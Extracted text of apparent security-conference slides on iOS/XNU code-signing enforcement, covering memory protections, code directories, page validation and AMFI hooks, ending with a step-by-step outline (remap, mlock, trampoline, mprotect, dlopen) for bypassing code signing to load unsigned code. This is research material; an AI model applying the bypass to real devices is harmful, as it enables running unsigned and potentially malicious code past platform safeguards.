6 7 8 9 10 11 12 o From Kiev, Ukraine o Staff Engineer at Lookout o Focused on XNU, Linux and LLVM internals o Interested in jailbreak techniques o Worked on obfuscation and DRM in a past o Member of Fried Apple team
permission o Pages can never be both writable and executable o No dynamic code generation without JIT o Non executable stack and heap o ASLR / KASLR 1 2 3 4 5 6 7 8 9 10 11 12 Memory protections
o Key component of blob is the Code Directory o File page hashes are individually stored into slots o Special slots (_CodeResources, Entitlements etc) o CDHash: Master hash of code slots hashes 1 2 3 4 5 6 7 8 9 10 11 12 Code signature format
a page fault o A page fault occurs when a page is loaded o Validated page means that page have hash in CSDir o Tainted page calculated page hash != stored page hash o Process with invalid codesign status will be killed 1 2 3 4 5 6 7 8 9 10 11 12
SIGNING:! * When soft faulting a page, we have to validate the page if:! * 1. the page is being mapped in user space! * 2. the page hasn't already been found to be "tainted"! * 3. the page belongs to a code-signed object! * 4. the page has not been validated yet or has been mapped for write.! */! ! #define VM_FAULT_NEED_CS_VALIDATION(pmap, page) \! ((pmap) != kernel_pmap /*1*/ && \! !(page)->cs_tainted /*2*/ && \! (page)->object->code_signed /*3*/ && \! (!(page)->cs_validated || (page)->wpmapped /*4*/)) 13 14 15 16 17 18 19 20 21 22 23 24
Integrity (AMFI) o Registering hooks in MACF o mpo_proc_check_get_task o mpo_vnode_check_signature o mpo_vnode_check_exec o and many more... 13 14 15 16 17 18 19 20 21 22 23 24
new security features o Debugging 3rd party code o Logging and tracing API calls o Reverse engineering and de-obfuscation o Interposing to the rescue 13 14 15 16 17 18 19 20 21 22 23 24
Info - contains rebasing opcodes o Bind Info - for required import symbols o Lazy Bind Info - symbol binding info for lazy imports o Weak Bind Info – symbol binding info for weak imports o Export Info - symbol binding info for exported symbols Details - http://newosxbook.com/articles/DYLD.html 13 14 15 16 17 18 19 20 21 22 23 24
19 20 21 22 23 24 o All frameworks and libraries o Loaded into each process space o Used for performance and security reasons o ASLR slide randomized at boot time
new RW page over ü Copy original content back ü Write trampoline ü mprotect to RX o Do something with codesign(?) Sounds like a plan 25 26 27 28 29 30 31 32 33 34 35 36
page fault o How we can prevent page fault ? o What if we mlock page ... mlock(data & (~PAGE_MASK)), PAGE_SIZE);! ! o … and it works! 25 26 27 28 29 30 31 32 33 34 35 36
page base ü memcpy page contents to temporary buffer ü mmap new RW page over ü memcpy original content back ü mlock page ü memcpy trampoline code ü mprotect page to RX 25 26 27 28 29 30 31 32 33 34 35 36
ü Hook xmmap and mlock all regions that have exec permission ü dlopen unsigned code J https://github.com/kpwn/921csbypass 25 26 27 28 29 30 31 32 33 34 35 36